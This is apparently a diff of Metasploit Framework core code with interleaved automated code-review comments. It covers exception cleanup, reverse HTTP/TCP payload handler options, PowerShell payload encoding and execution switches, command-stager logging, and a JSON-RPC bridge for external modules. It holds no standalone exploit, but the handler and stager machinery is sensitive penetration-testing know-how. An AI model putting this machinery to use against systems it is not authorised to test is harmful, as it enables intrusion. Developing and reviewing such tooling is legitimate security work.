@@ -27,7 +27,7 @@ module Scriptable # Scan all of the path combinations check_paths.each { |path| - if ::File.exist?(path) + if ::File.file?(path) full_path = path break end @@ -150,7 +150,7 @@ module Scriptable # session local_exploit_opts = local_exploit_opts.merge(opts) - new_session = mod.exploit_simple( + mod.exploit_simple( 'Payload' => local_exploit_opts.delete('payload'), 'Target' => local_exploit_opts.delete('target'), 'LocalInput' => self.user_input, diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 881836e7f9..6eca2772ce 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -10,8 +10,7 @@ # ### -# Sanity check this version of ruby -require 'msf/sanity' +# Include backported features for older versions of Ruby require 'backports' # The framework-core depends on Rex diff --git a/lib/msf/core/author.rb b/lib/msf/core/author.rb index e5ca594bdd..6dab2bee99 100644 --- a/lib/msf/core/author.rb +++ b/lib/msf/core/author.rb @@ -17,6 +17,7 @@ class Msf::Author KNOWN = { 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', 'anonymous' => 'Unknown', + 'aushack' => 'patrick' + 0x40.chr + 'osisecurity.com.au', 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', @@ -39,7 +40,6 @@ class Msf::Author 'mubix' => 'mubix' + 0x40.chr + 'hak5.org', 'natron' => 'natron' + 0x40.chr + 'metasploit.com', 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', - 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com', 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index a966c8b1f1..da69eccd6c 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb 
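Review bot: Dropping `require 'msf/sanity'` from core.rb removes the Ruby version check that ran at framework load, and the hunk shows no replacement; if that check is now enforced somewhere else (a `ruby` directive in the Gemfile, for instance), a comment saying so would stop the next reader from re-adding it, otherwise an unsupported interpreter now fails later with a less obvious error. Suggested replacement for the new comment line: `# Include backported features for older versions of Ruby (the interpreter version itself is checked by <where>)` with the location filled in.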
@@ -43,7 +43,7 @@ def rport end def set_nmap_cmd - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") nmap_set_log nmap_add_ports nmap_cmd = [self.nmap_bin] @@ -54,7 +54,7 @@ def set_nmap_cmd end def get_nmap_ver - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") res = "" nmap_cmd = [self.nmap_bin] nmap_cmd << "--version" @@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil) end def nmap_build_args - raise RuntimeError, "nmap_build_args() not defined by #{self.refname}" + raise "nmap_build_args() not defined by #{self.refname}" end def nmap_run @@ -159,13 +159,13 @@ end # A helper to add in rport or rports as a -p argument def nmap_add_ports if not nmap_validate_rports - raise RuntimeError, "Cannot continue without a valid port list." + raise "Cannot continue without a valid port list." end port_arg = "-p \"#{datastore['RPORT'] || rports}\"" if nmap_validate_arg(port_arg) self.nmap_args << port_arg else - raise RunTimeError, "Argument is invalid" + raise "Argument is invalid" end end @@ -237,7 +237,7 @@ end # module to ferret out whatever's interesting in this host # object. def nmap_hosts(&block) - @nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.") + @nmap_bin || (raise "Cannot locate the nmap binary.") fh = self.nmap_log[0] nmap_data = fh.read(fh.stat.size) # fh.unlink diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb index cb4ccb19ce..45eada1df0 100644 --- a/lib/msf/core/db_manager/report.rb +++ b/lib/msf/core/db_manager/report.rb @@ -44,7 +44,7 @@ module Msf::DBManager::Report unless artifact.valid? errors = artifact.errors.full_messages.join('; ') - raise RuntimeError "Artifact to be imported is not valid: #{errors}" + raise "Artifact to be imported is not valid: #{errors}" end artifact.save end 
@@ -66,7 +66,7 @@ module Msf::DBManager::Report unless report.valid? errors = report.errors.full_messages.join('; ') - raise RuntimeError "Report to be imported is not valid: #{errors}" + raise "Report to be imported is not valid: #{errors}" end report.state = :complete # Presume complete since it was exported report.save @@ -83,4 +83,4 @@ module Msf::DBManager::Report wspace.reports } end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index 11c29a5c32..59e77b92f2 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -137,6 +137,8 @@ module Exploit::CmdStager raise ArgumentError, 'The command stager could not be generated' end + vprint_status("Generated command stager: #{cmd_list.join}") + cmd_list end diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index daa6ac6f83..a7194c8bb1 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -474,7 +474,13 @@ module Exploit::Remote::HttpClient uri = normalize_uri(custom_uri || target_uri.to_s) - "#{uri_scheme}://#{rhost}#{uri_port}#{uri}" + if Rex::Socket.is_ipv6?(rhost) + uri_host = "[#{rhost}]" + else + uri_host = rhost + end + + "#{uri_scheme}://#{uri_host}#{uri_port}#{uri}" end # diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index eac730b97d..3686faa8cd 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb 
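Review bot: In the cmdstager hunk, `cmd_list.join` concatenates the generated commands with no separator, so a multi-element stager is logged as one run-on string in which the boundary between commands is lost; `vprint_status("Generated command stager: #{cmd_list.join("\n")}")` (or `join(' ; ')`) keeps each command readable. Since the list embeds the encoded payload the line can be very long, so keeping it verbose-only is right. The enclosing method begins before the hunk.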
@@ -14,9 +14,11 @@ module Exploit::Powershell
 OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
 OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
 OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
+ OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
+ OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]),
 OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
 OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]),
- OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]),
+ OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]),
 OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]),
 OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]])
 ]
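Review bot: The description of the new `Powershell::wrap_double_quotes` option still reads `'Wraps the -Command argument in single quotes'`, carried over from the removed `use_single_quotes`, so the help text contradicts the option name; it should be `OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in double quotes', true]),`. Renaming the datastore key also silently ignores any `Powershell::use_single_quotes` setting in existing resource scripts while the default flips from false to true; the handler options later in this change set use an `aliases:` keyword, and if `OptBool` accepts it too, an alias for the old name would keep those configurations working.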
@@ -215,14 +217,13 @@ module Exploit::Powershell # powershell script # @option opts [Boolean] :remove_comspec Removes the %COMSPEC% # environment variable at the start of the command line - # @option opts [Boolean] :use_single_quotes Wraps the -Command - # argument in single quotes unless :encode_final_payload + # @option opts [Boolean] :wrap_double_quotes Wraps the -Command + # argument in double quotes unless :encode_final_payload # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) - options.validate(datastore) - - %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt| + %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload + remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 36c03bca7c..f91f3f5a09 100755 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") @@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 70b60081e0..24d882aad1 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb 
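Review bot: `options.validate(datastore)` is removed from `cmd_psh_payload` with no explanation in the hunk; if this was the only point at which the `Powershell::*` datastore values were validated, an out-of-range value such as a `Powershell::method` outside the enum now reaches the generator unchecked. Either keep the call or add a comment above the `%i[...]` map saying where validation now happens, e.g. `# datastore values are validated by the module framework before this is reached — confirm`. The method continues past the end of the hunk.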
@@ -222,7 +222,16 @@ protected
 s.set_from_exploit(assoc_exploit)
 # Pass along any associated payload uuid if specified
- s.payload_uuid = opts[:payload_uuid] if opts[:payload_uuid]
+ if opts[:payload_uuid]
+ s.payload_uuid = opts[:payload_uuid]
+ if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[s.payload_uuid.puid_hex])
+ s.payload_uuid.registered = true
+ s.payload_uuid.name = uuid_info['name']
+ s.payload_uuid.timestamp = uuid_info['timestamp']
+ else
+ s.payload_uuid.registered = false
+ end
+ end
 # If the session is valid, register it with the framework and
 # notify any waiters we may have.
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index d9a1d7ff4d..025e127608 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
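Review bot: The `else` branch assigns `s.payload_uuid.registered = false` even when the `respond_to?(:puid_hex)` test was the part that failed, i.e. when `payload_uuid` is not the object type carrying these accessors; the `respond_to?` guard exists precisely because such values occur, and for them the assignment raises `NoMethodError` in the middle of session creation. Restructure so both the lookup and the flag sit under the type check: `if s.payload_uuid.respond_to?(:puid_hex)` wrapping `uuid_info = framework.uuid_db[s.payload_uuid.puid_hex]` and then `s.payload_uuid.registered = !uuid_info.nil?`, with the name/timestamp assignments only when `uuid_info` is present. The enclosing method starts and ends outside the hunk.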
@@ -52,16 +52,38 @@ module ReverseHttp register_advanced_options( [ - - OptString.new('MeterpreterUserAgent', [false, 'The user-agent that the payload should use for communication', Rex::UserAgent.shortest]), - OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']), - OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']), - OptBool.new('OverrideRequestHost', [false, 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', false]), - OptString.new('OverrideLHOST', [false, 'When OverrideRequestHost is set, use this value as the host name for secondary requests']), - OptPort.new('OverrideLPORT', [false, 'When OverrideRequestHost is set, use this value as the port number for secondary requests']), - OptString.new('OverrideScheme', [false, 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https']), - OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

']), - OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false]) + OptAddress.new('ReverseListenerBindAddress', + 'The specific IP address to bind to on the local system' + ), + OptBool.new('OverrideRequestHost', + 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', + ), + OptString.new('OverrideLHOST', + 'When OverrideRequestHost is set, use this value as the host name for secondary requests' + ), + OptPort.new('OverrideLPORT', + 'When OverrideRequestHost is set, use this value as the port number for secondary requests' + ), + OptString.new('OverrideScheme', + 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https' + ), + OptString.new('HttpUserAgent', + 'The user-agent that the payload should use for communication', + default: Rex::UserAgent.shortest, + aliases: ['MeterpreterUserAgent'] + ), + OptString.new('HttpServerName', + 'The server header that the handler will send in response to requests', + default: 'Apache', + aliases: ['MeterpreterServerName'] + ), + OptString.new('HttpUnknownRequestResponse', + 'The returned HTML response body when the handler receives a request that is not from a payload', + default: '

It works!

' + ), + OptBool.new('IgnoreUnknownPayloads', + 'Whether to drop connections from payloads using unknown UUIDs' + ) ], Msf::Handler::ReverseHttp) end @@ -204,7 +226,7 @@ module ReverseHttp raise ex if (ex) - self.service.server_name = datastore['MeterpreterServerName'] + self.service.server_name = datastore['HttpServerName'] # Add the new resource service.add_resource((luri + "/").gsub("//", "/"), @@ -245,14 +267,14 @@ protected info = {} return @proxy_settings if @proxy_settings - if datastore['PayloadProxyHost'].to_s == '' + if datastore['HttpProxyHost'].to_s == '' @proxy_settings = info return @proxy_settings end - info[:host] = datastore['PayloadProxyHost'].to_s - info[:port] = (datastore['PayloadProxyPort'] || 8080).to_i - info[:type] = datastore['PayloadProxyType'].to_s + info[:host] = datastore['HttpProxyHost'].to_s + info[:port] = (datastore['HttpProxyPort'] || 8080).to_i + info[:type] = datastore['HttpProxyType'].to_s uri_host = info[:host] @@ -266,11 +288,11 @@ protected info[:info] = "socks=#{info[:info]}" else info[:info] = "http://#{info[:info]}" - if datastore['PayloadProxyUser'].to_s != '' - info[:username] = datastore['PayloadProxyUser'].to_s + if datastore['HttpProxyUser'].to_s != '' + info[:username] = datastore['HttpProxyUser'].to_s end - if datastore['PayloadProxyPass'].to_s != '' - info[:password] = datastore['PayloadProxyPass'].to_s + if datastore['HttpProxyPass'].to_s != '' + info[:password] = datastore['HttpProxyPass'].to_s end end @@ -347,8 +369,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 997316f688..33269e20e2 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb 
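Review bot: `OverrideScheme` stays a free-form `OptString` whose value is used to build the URLs handed out for secondary requests, while its description says it should be `http` or `https`; since `OptBase#initialize` in this change accepts `regex:`, `OptString.new('OverrideScheme', '…', regex: /\Ahttps?\z/)` rejects anything else when the option is set. `OverrideRequestHost` and `IgnoreUnknownPayloads` now rely on `OptBool`'s implicit `required: true, default: false` rather than stating it, and `OverrideRequestHost` carries a stray trailing comma; an explicit `default: false` keeps the intent visible at the registration site. In the `@@ -347` hunk `lhost:`/`lport:` are dropped from the `generate_stage` call — if any `generate_stage` implementation still reads those keys it now receives nil (cannot confirm from this diff).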
@@ -38,14 +38,11 @@ module ReverseHttpsProxy register_options( [ - OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]), - OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), - OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]), - OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]), - OptEnum.new('PayloadProxyType', [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]), - OptString.new('PayloadProxyUser', [ false, "An optional username for HTTP proxy authentication"]), - OptString.new('PayloadProxyPass', [ false, "An optional password for HTTP proxy authentication"]) - ], Msf::Handler::ReverseHttpsProxy) + OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"), + OptPort.new('LPORT', "The local listener port", default: 8443) + ] + + Msf::Opt::http_proxy_options, + Msf::Handler::ReverseHttpsProxy) register_advanced_options( [ diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index d938d46934..2cba8cf02a 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,15 +45,6 @@ module ReverseTcp # XXX: Not supported by all modules register_advanced_options( [ - OptInt.new( - 'StagerRetryCount', - [ true, 'The number of connection attempts to try before exiting the process', 10 ], - aliases: ['ReverseConnectRetries'] - ), - OptFloat.new( - 'StagerRetryWait', - [ false, 'Number of seconds to wait for the stager between reconnect attempts', 5.0 ] - ), OptAddress.new( 'ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system' ] @@ -62,7 +53,8 @@ module ReverseTcp 'ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false ] ) - ], + ] + + Msf::Opt::stager_retry_options, Msf::Handler::ReverseTcp ) 
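Review bot: Swapping the handler's own proxy options for `Msf::Opt::http_proxy_options` turns `HttpProxyHost`/`HttpProxyPort` from required-with-defaults (`127.0.0.1`, `8080`) into optional options with no default — the shared definitions later in this diff describe them as "optional" — so for a handler whose whole purpose is to go through a proxy, an operator who leaves them unset gets an unproxied listener instead of a validation error (assuming this handler reuses `ReverseHttp#proxy_settings`, which returns an empty hash when `HttpProxyHost` is blank). Either keep explicit required proxy options here, or check `datastore['HttpProxyHost'].to_s.empty?` in the handler setup and fail loudly. In the reverse_tcp hunk on the same line, `StagerRetryWait` changes from `OptFloat` (5.0) to `OptInt` (5) via `stager_retry_options`, so sub-second waits are no longer expressible — worth confirming that is intended.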
diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 3e4ac1a451..d90c9cbfed 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb 
@@ -1,23 +1,79 @@ module Msf::Module::External + include Msf::Auxiliary::Report + def wait_status(mod) - while mod.running - m = mod.get_status - if m - case m['level'] - when 'error' - print_error m['message'] - when 'warning' - print_warning m['message'] - when 'good' - print_good m['message'] - when 'info' - print_status m['message'] - when 'debug' - vprint_status m['message'] - else - print_status m['message'] + begin + while mod.running + m = mod.get_status + if m + case m.method + when :message + log_output(m) + when :report + process_report(m) + when :reply + # we're done + break + end end end + rescue Interrupt => e + raise e + rescue Exception => e + elog e.backtrace.join("\n") + fail_with Msf::Module::Failure::Unknown, e.message + end + end + + def log_output(m) + message = m.params['message'] + + case m.params['level'] + when 'error' + print_error message + when 'warning' + print_warning message + when 'good' + print_good message + when 'info' + print_status message + when 'debug' + vprint_status message + else + print_status message + end + end + + def process_report(m) + data = m.params['data'] + + case m.params['type'] + when 'host' + # Required + host = {host: data['host']} + + # Optional + host[:state] = data['state'] if data['state'] # TODO: validate -- one of the Msf::HostState constants (unknown, alive, dead) + host[:os_name] = data['os_name'] if data['os_name'] + host[:os_flavor] = data['os_flavor'] if data['os_flavor'] + host[:os_sp] = data['os_sp'] if data['os_sp'] + host[:os_lang] = data['os_lang'] if data['os_lang'] + host[:arch] = data['arch'] if data['arch'] # TODO: validate -- one of the ARCH_* constants + host[:mac] = data['mac'] if data['mac'] + host[:scope] = data['scope'] if data['scope'] + host[:virtual_host] = data['virtual_host'] if data['virtual_host'] + + report_host(host) + when 'service' + # Required + service = {host: data['host'], port: data['port'], proto: data['proto']} + + # Optional + service[:name] = data['name'] if 
data['name'] + + report_service(service) + else + print_warning "Skipping unrecognized report type #{m.params['type']}" end end end diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index c1b2d5b755..ecc6f3852b 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -24,6 +24,10 @@ module Msf::Module::FullName type + '/' + refname end + def promptname + refname + end + def shortname refname.split('/').last end @@ -55,9 +59,16 @@ module Msf::Module::FullName end # - # Returns the module's framework short name. This is a - # possibly conflicting name used for things like console - # prompts. + # Returns the module's framework prompt-friendly name. + # + # reverse_tcp + # + def promptname + self.class.promptname + end + + # + # Returns the module's framework short name. # # reverse_tcp # diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 90f82c3bd5..de0e7fbaca 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -143,8 +143,7 @@ class Msf::Module::Platform if (not mod.const_defined?('Names')) elog("Failed to instantiate the platform list for module #{mod}") - raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") - return nil + raise "Failed to instantiate the platform list for module #{mod}" end abbrev = mod.const_get('Abbrev') diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 4968937ae4..98d9a1c56d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -116,8 +116,8 @@ module Msf::ModuleManager::Loading loaders.each do |loader| if loader.loadable?(path) - count_by_type.merge!(loader.load_modules(path, options)) do |key, old, new| - old + new + count_by_type.merge!(loader.load_modules(path, options)) do |key, prev, now| + prev + now end end end 
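Review bot: `rescue Exception => e` in `wait_status` also catches `SystemExit`, `NoMemoryError` and every `SignalException` other than the one `Interrupt` clause above it, and turns them into a module failure. `rescue StandardError => e` (or a bare `rescue => e`) covers errors raised by the module bridge without trapping process-level exceptions, and makes the separate `rescue Interrupt` clause unnecessary because `Interrupt` is not a `StandardError`. In `process_report`, `data['host']`, `data['port']` and `data['proto']` come from the external process and go straight into `report_host`/`report_service`; the two TODOs already flag `state` and `arch`, and `host` deserves the same validation before it is written to the database.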
diff --git a/lib/msf/core/modules/external/bridge.rb b/lib/msf/core/modules/external/bridge.rb index 0a031d668c..c150ae258e 100644 --- a/lib/msf/core/modules/external/bridge.rb +++ b/lib/msf/core/modules/external/bridge.rb @@ -2,6 +2,7 @@ require 'msf/core/modules/external' require 'msf/core/modules/external/message' require 'open3' +require 'json' class Msf::Modules::External::Bridge @@ -26,14 +27,13 @@ class Msf::Modules::External::Bridge def get_status if self.running - n = receive_notification - if n && n['params'] - n['params'] - else + m = receive_notification + if m.nil? close_ios self.running = false - n['response'] if n end + + return m end end @@ -41,30 +41,35 @@ class Msf::Modules::External::Bridge self.env = {} self.running = false self.path = module_path + self.cmd = [self.path, self.path] + self.messages = Queue.new + self.buf = '' end protected attr_writer :path, :running - attr_accessor :env, :ios + attr_accessor :cmd, :env, :ios, :buf, :messages, :wait_thread def describe resp = send_receive(Msf::Modules::External::Message.new(:describe)) close_ios - resp['response'] + resp.params end - # XXX TODO non-blocking writes, check write lengths, non-blocking JSON parse loop read + # XXX TODO non-blocking writes, check write lengths def send_receive(message) send(message) - read_json(message.id, self.ios[1]) + recv(message.id) end def send(message) - input, output, status = ::Open3.popen3(env, [self.path, self.path]) - self.ios = [input, output, status] - case Rex::ThreadSafe.select(nil, [input], nil, 0.1) + input, output, err, status = ::Open3.popen3(self.env, self.cmd) + self.ios = [input, output, err] + self.wait_thread = status + # We would call Rex::Threadsafe directly, but that would require rex for standalone use + case select(nil, [input], nil, 0.1) when nil raise "Cannot run module #{self.path}" when [[], [input], []] 
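Review bot: `describe` dereferences `resp.params`, but `send_receive` now returns whatever `recv` returns, and `recv` (later in this diff) yields nil on EOF, so a module that exits before answering the describe request fails with `NoMethodError` on nil rather than a message naming the module. Adding `raise "Module #{self.path} exited without responding to describe" if resp.nil?` after `close_ios` gives the operator something actionable. In `get_status`, the trailing `return m` is redundant as the last expression of the method, and the `if m.nil?` block already closes the pipes, so a comment such as `# nil means the module closed its side; tear down and report not running` would document the contract `wait_status` relies on.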
@@ -76,12 +81,10 @@ class Msf::Modules::External::Bridge end def receive_notification - input, output, status = self.ios - case Rex::ThreadSafe.select([output], nil, nil, 10) - when nil - nil - when [[output], [], []] - read_json(nil, output) + if self.messages.empty? + recv + else + self.messages.pop end end 
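Review bot: `receive_notification` now calls `recv` with its default 600-second timeout (next hunk) in place of the previous 10-second `select`, and a timeout in `recv` is raised as `EOFError` and returned as nil, which `get_status` treats as the module having exited. A passive module that is legitimately silent for more than ten minutes — the `capture_server` template added in this change prints "Starting server..." and then just waits — is therefore marked not running and has its pipes closed. Either pass an explicit, much longer (or nil) timeout for notifications, or have `recv` distinguish "timed out" from "pipe closed" so this caller can keep waiting.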
@@ -89,18 +92,76 @@ class Msf::Modules::External::Bridge fd.write(json) end - def read_json(id, fd) + def recv(filter_id=nil, timeout=600) + _, out, err = self.ios + message = '' + + # Multiple messages can come over the wire all at once, and since yajl + # doesn't play nice with windows, we have to emulate a state machine to + # read just enough off the wire to get one request at a time. Since + # Windows cannot do a nonblocking read on a pipe, we are forced to do a + # whole lot of `select` syscalls and keep a buffer ourselves :( begin - resp = fd.readpartial(10_000) - JSON.parse(resp) + loop do + # This is so we don't end up calling JSON.parse on every char and + # catch an exception. Windows can't do nonblock on pipes, so we + # still have to do the select if we are not at the end of object + # and don't have any buffer left + parts = self.buf.split '}', 2 + if parts.length == 2 # [part, rest] + message << parts[0] << '}' + self.buf = parts[1] + break + elsif parts.length == 1 # [part] + if self.buf[-1] == '}' + message << parts[0] << '}' + self.buf = '' + break + else + message << parts[0] + self.buf = '' + end + end + + # We would call Rex::Threadsafe directly, but that would require Rex for standalone use + res = select([out, err], nil, nil, timeout) + if res == nil + # This is what we would have gotten without Rex and what `readpartial` can also raise + raise EOFError.new + else + fds = res[0] + # Preferentially drain and log stderr + if fds.include? err + errbuf = err.readpartial(4096) + elog "Unexpected output running #{self.path}:\n#{errbuf}" + end + if fds.include? 
out + self.buf << out.readpartial(4096) + end + end + end + + m = Msf::Modules::External::Message.from_module(JSON.parse(message)) + if filter_id && m.id != filter_id + # We are filtering for a response to a particular message, but we got + # something else, store the message and try again + self.messages.push m + read_json(filter_id, timeout) + else + # Either we weren't filtering, or we got what we were looking for + m + end + rescue JSON::ParserError + # Probably an incomplete response, but no way to really tell. Keep trying + # until EOF + retry rescue EOFError => e - {} + nil end end def close_ios - input, output, status = self.ios - [input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know. + self.ios.each {|fd| fd.close rescue nil} # Yeah, yeah. I know. end end diff --git a/lib/msf/core/modules/external/message.rb b/lib/msf/core/modules/external/message.rb index 429e47fc00..ba3b739a71 100644 --- a/lib/msf/core/modules/external/message.rb +++ b/lib/msf/core/modules/external/message.rb @@ -2,11 +2,25 @@ require 'msf/core/modules/external' require 'base64' require 'json' +require 'securerandom' class Msf::Modules::External::Message - attr_reader :method, :id - attr_accessor :params + attr_reader :method + attr_accessor :params, :id + + def self.from_module(j) + if j['method'] + m = self.new(j['method'].to_sym) + m.params = j['params'] + m + elsif j['response'] + m = self.new(:reply) + m.params = j['response'] + m.id = j['id'] + m + end + end def initialize(m) self.method = m @@ -20,5 +34,5 @@ class Msf::Modules::External::Message protected - attr_writer :method, :id + attr_writer :method end diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 288a8065b2..9b5b563c6a 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py 
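Review bot: When `recv` is filtering for a particular response id and receives some other message, it calls `read_json(filter_id, timeout)`, but this hunk renames `read_json` to `recv`, so that path raises `NoMethodError` the first time a notification arrives ahead of a reply; it should be `recv(filter_id, timeout)`, and a loop rather than recursion avoids growing the stack when many notifications precede the reply. `message` and `self.buf` are appended to without bound until a `}` shows up, so a module that writes output without ever closing an object grows memory until the timeout; a size cap with a clear error would be safer. `raise EOFError.new` reads better as `raise EOFError`. In the message.rb hunk on the same line, `from_module` returns nil for a JSON object carrying neither `method` nor `response`, which `recv` then dereferences as `m.id`.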
@@ -1,20 +1,37 @@ import sys, os, json def log(message, level='info'): - print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': { + rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': { 'level': level, 'message': message - }})) - sys.stdout.flush() + }}) -def run(metadata, exploit): +def report_host(ip, opts={}): + host = opts.copy() + host.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'host', 'data': host + }}) + +def report_service(ip, opts={}): + service = opts.copy() + service.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'service', 'data': service + }}) + + +def run(metadata, module_callback): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] - exploit(args) - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': { - 'message': 'Exploit completed' - }})) - sys.stdout.flush() + module_callback(args) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { + 'message': 'Module completed' + }}) + +def rpc_send(req): + print(json.dumps(req)) + sys.stdout.flush() diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4c47d945c8..fe20aaf3ef 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -9,6 +9,13 @@ class Msf::Modules::External::Shim case mod.meta['type'] when 'remote_exploit_cmd_stager' remote_exploit_cmd_stager(mod) + when 'capture_server' + capture_server(mod) + when 'dos' + dos(mod) + else + # TODO have a nice load error show up in the logs + '' end end 
